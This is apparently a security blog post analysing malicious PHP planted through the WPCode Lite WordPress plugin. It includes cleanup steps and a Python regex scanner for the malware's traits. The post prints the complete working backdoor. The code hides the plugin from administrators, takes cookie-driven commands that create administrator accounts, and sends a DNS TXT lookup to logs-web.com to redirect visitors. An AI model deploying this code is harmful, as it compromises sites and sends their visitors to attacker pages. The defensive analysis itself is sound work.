WPCode Lite plugin hiding the plugin and malicious code and redirecting WordPress site

June 8, 2024

The code snippet shared here appears to be part of a WordPress plugin or theme. It hides the WPCode plugin (Insert Headers and Footers) from the WordPress admin interface and, in its second half, redirects site visitors to a malicious website. Let's break it down to understand its functionality and implications:

    $_pwsa = '212841f41911f6c6d1b8691aec41dc9c';

    if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {
        add_action('admin_print_scripts', function () {
            echo '';
        });

        add_filter('all_plugins', function ($plugins) {
            unset($plugins['insert-headers-and-footers/ihaf.php']);
            return $plugins;
        });
    }

Variable Definition:

    $_pwsa = '212841f41911f6c6d1b8691aec41dc9c';

This line assigns a string to the variable $_pwsa. On its own the value does nothing; it is used further down in the snippet as a shared secret that a visitor's pw cookie must match before the backdoor commands are accepted. An obfuscated variable name holding a hash-like constant is a red flag for malicious intent.

Conditional Statement:

    if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {

This checks whether the current user has administrator privileges and whether the show_all parameter is absent from the URL query string. If both conditions are true, the code within this block executes. The show_all parameter acts as an operator switch: appending ?show_all to an admin page URL turns the hiding off, which is also a quick way for a site owner to confirm whether the plugin is being concealed.

Hiding Elements with CSS:

    add_action('admin_print_scripts', function () {
        echo '';
    });

This function hooks into the admin_print_scripts action, which runs when scripts are printed in the head of admin pages. It outputs CSS (the echoed string is empty in this listing) that hides elements related to the WPCode plugin in the WordPress admin interface, making them invisible to administrators while the plugin keeps running.

Hiding the Plugin from the Plugins List:

    add_filter('all_plugins', function ($plugins) {
        unset($plugins['insert-headers-and-footers/ihaf.php']);
        return $plugins;
    });

This callback hooks into the all_plugins filter, which WordPress applies to the list of installed plugins before rendering the Plugins page. It removes the entry for insert-headers-and-footers/ihaf.php from that list, so the plugin no longer appears on the page. The plugin itself remains installed and active; only its listing is suppressed.

Implications

  • Hiding from Admins: By hiding the WPCode plugin interface and related elements from administrators, the code conceals its presence and actions, a tactic commonly used in malicious plugins to avoid detection.
  • Potential Malicious Intent: Code that hides itself is usually performing actions the site owner should not see, ranging from injecting spam content to redirecting traffic or other harmful activity. In this case the second half of the snippet does exactly that: it redirects visitors and can create administrator accounts.

What to Do

  1. Immediate Action:
    • Remove or deactivate the suspicious code/plugin immediately.
    • Check your WordPress installation for other signs of compromise, such as unauthorized user accounts or unfamiliar files.
  2. Security Scan:
    • Use a reputable security plugin (like Wordfence or Sucuri) to scan your site for malware and vulnerabilities.
  3. Update and Secure:
    • Ensure that all themes, plugins, and WordPress core are up to date.
    • Use strong passwords and enable two-factor authentication for all admin accounts.
  4. Review Site Content:
    • Check for any unauthorized changes to your site content or settings.
  5. Backup:
    • Regularly back up your site to ensure you can restore it in case of future issues.

By addressing these steps, you can mitigate the risk posed by the suspicious code and enhance the overall security of your WordPress site.
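As an added triage aid that is not part of the original post, the following Python script scans a WordPress tree for the traits of this snippet: the all_plugins unset, base64-decoded cookies used as a command channel, the split-string dns_get_record call, a DNS TXT answer fed to wp_redirect, and cookie-driven administrator creation. The indicator names and the two sample inputs are constructed here; the scan is a heuristic, so every hit needs manual review.

```python
import re
from pathlib import Path

# Each indicator is (name, regex). The patterns are lifted from the snippet on
# this page; they are triage heuristics, not a complete malware signature.
INDICATORS = [
    ("hide_plugin_from_list", re.compile(r"add_filter\(\s*['\"]all_plugins['\"].*?unset\(\s*\$plugins\[", re.S)),
    ("cookie_command_channel", re.compile(r"base64_decode\(\s*\$_COOKIE\[")),
    ("obfuscated_dns_get_record", re.compile(r"['\"]dns_['\"]\s*\.\s*['\"]get['\"]\s*\.\s*['\"]_record['\"]")),
    ("dns_txt_controlled_redirect", re.compile(r"DNS_TXT.*?wp_redirect\(", re.S)),
    ("cookie_created_admin", re.compile(r"wp_create_user\(.*?set_role\(\s*['\"]administrator['\"]", re.S)),
]

def scan_source(src: str) -> list[str]:
    """Return the names of every indicator present in one PHP source string."""
    return [name for name, rx in INDICATORS if rx.search(src)]

def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk a WordPress install (wp-content is the usual target) and report
    every .php file that trips at least one indicator."""
    hits: dict[str, list[str]] = {}
    for path in root.rglob("*.php"):
        try:
            found = scan_source(path.read_text(errors="ignore"))
        except OSError:
            continue  # unreadable file: skip it rather than abort the scan
        if found:
            hits[str(path)] = found
    return hits

# Constructed samples: a condensed copy of the page's snippet, and a harmless
# plugin that also touches the all_plugins filter but removes nothing.
SAMPLE_MALICIOUS = r"""<?php
add_filter('all_plugins', function ($plugins) {
    unset($plugins['insert-headers-and-footers/ihaf.php']);
    return $plugins;
});
function _gcookie($n) { return (isset($_COOKIE[$n])) ? base64_decode($_COOKIE[$n]) : ''; }
$user_id = wp_create_user($u, $p, $e); $user = new WP_User($user_id); $user->set_role('administrator');
$v = "dns_" . "get" . "_record"; $s = @$v($req, DNS_TXT); wp_redirect($s); exit;
"""
SAMPLE_BENIGN = r"""<?php
add_filter('all_plugins', function ($plugins) { return $plugins; });
add_action('init', function () { if (is_admin()) { return; } });
"""

if __name__ == "__main__":
    print("malicious sample:", scan_source(SAMPLE_MALICIOUS))  # all five names
    print("benign sample:", scan_source(SAMPLE_BENIGN))        # []
```

Run it against wp-content/plugins and wp-content/mu-plugins first; a legitimate WPCode install will not trip the unset or cookie patterns.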

Need help solving the problem? Please feel free to message me.

The redirect and backdoor code:

This is the remainder of the snippet, where $_pwsa is used. If a visitor's pw cookie (base64-decoded) matches $_pwsa, the c cookie selects a command: sd stores a domain taken from the d cookie in the WordPress option d, and au creates a new administrator account from the u, p and e cookies. Requests to the login page and requests carrying a skip=1 cookie are left alone. For every other visitor who is not logged in, _red() builds a hostname from the site's domain, the visitor's IP address, a random number and a device flag under logs-web.com (or the domain stored in option d), performs a DNS TXT lookup on it, base64-decodes the answer and, if it begins with http, redirects the visitor there. The exp transient records each IP so that a visitor is redirected at most once per 24 hours, which makes the behaviour hard to reproduce from the site owner's own browser. When checking a site, look for an unexpected d option and exp transient in wp_options, and test from an address that has not visited the site recently.

    if (!function_exists('_red')) {
        error_reporting(0);
        ini_set('display_errors', 0);
    
        function _gcookie($n)
        {
            return (isset($_COOKIE[$n])) ? base64_decode($_COOKIE[$n]) : '';
        }
    
        if (!empty($_pwsa) && _gcookie('pw') === $_pwsa) {
            switch (_gcookie('c')) {
                case 'sd':
                    $d = _gcookie('d');
                    if (strpos($d, '.') > 0) {
                        update_option('d', $d);
                    }
                    break;
                case 'au':
                    $u = _gcookie('u');
                    $p = _gcookie('p');
                    $e = _gcookie('e');
    
                    if ($u && $p && $e && !username_exists($u)) {
                        $user_id = wp_create_user($u, $p, $e);
                        $user = new WP_User($user_id);
                        $user->set_role('administrator');
                    }
                    break;
            }
            return;
        }
    
        if (@stripos(wp_login_url(), ''.$_SERVER['SCRIPT_NAME']) !== false) {
            return;
        }
    
        if (_gcookie("skip") === "1") {
            return;
        }
    
        function _is_mobile()
        {
            return @preg_match("/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", ''.$_SERVER["HTTP_USER_AGENT"]);
        }
    
        function _is_iphone()
        {
            return @preg_match("/(iphone|ipod)/i", ''.$_SERVER["HTTP_USER_AGENT"]);
        }
    
        function _user_ip()
        {
            foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
                if (array_key_exists($key, $_SERVER) && !empty($_SERVER[$key])) {
                    foreach (@explode(',', ''.$_SERVER[$key]) as $ip) {
                        $ip = trim($ip);
                        if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
                            return $ip;
                        }
                    }
                }
            }
    
            return false;
        }
    
        function _red()
        {
            if (is_user_logged_in()) {
                return;
            }
    
            $ip = _user_ip();
            if (!$ip) {
                return;
            }
    
            $exp = get_transient('exp');
            if (!is_array($exp)) {
                $exp = array();
            }
    
            foreach ($exp as $k => $v) {
                if (time() - $v > 86400) {
                    unset($exp[$k]);
                }
            }
    
            if (key_exists($ip, $exp) && (time() - $exp[$ip] < 86400)) {
                return;
            }
    
            $host = filter_var(parse_url('https://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME);
            $ips = str_replace(':', '-', $ip);
            $ips = str_replace('.', '-', $ips);
    
            $h = 'logs-web.com';
            $o = get_option('d');
            if ($o && strpos($o, '.') > 0) {
                $h = $o;
            }
            $m = _is_iphone() ? 'i' : 'm';
            $req = (!$host ? 'unk.com' : $host) . '.' . (!$ips ? '0-0-0-0' : $ips) . '.' . mt_rand(100000, 999999) . '.' . (_is_mobile() ? 'n' . $m : 'nd') . '.' . $h;
    
            $s = null;
            try {
                $v = "dns_" . "get" . "_record";
                $s = @$v($req, DNS_TXT);
            } catch (\Throwable $e) {
            } catch (\Exception $e) {
            }
    
            if (is_array($s) && !empty($s)) {
                if (isset($s[0]['txt'])) {
                    $s = $s[0]['txt'];
                    $s = base64_decode($s);
    
                    if ($s == 'err') {
                        $exp[$ip] = time();
                        delete_transient('exp');
                        set_transient('exp', $exp);
                    } else if (substr($s, 0, 4) === 'http') {
                        $exp[$ip] = time();
                        delete_transient('exp');
                        set_transient('exp', $exp);
                        wp_redirect($s);
                        exit;
                    }
                }
            }
        }
    
        add_action('init', '_red');
    }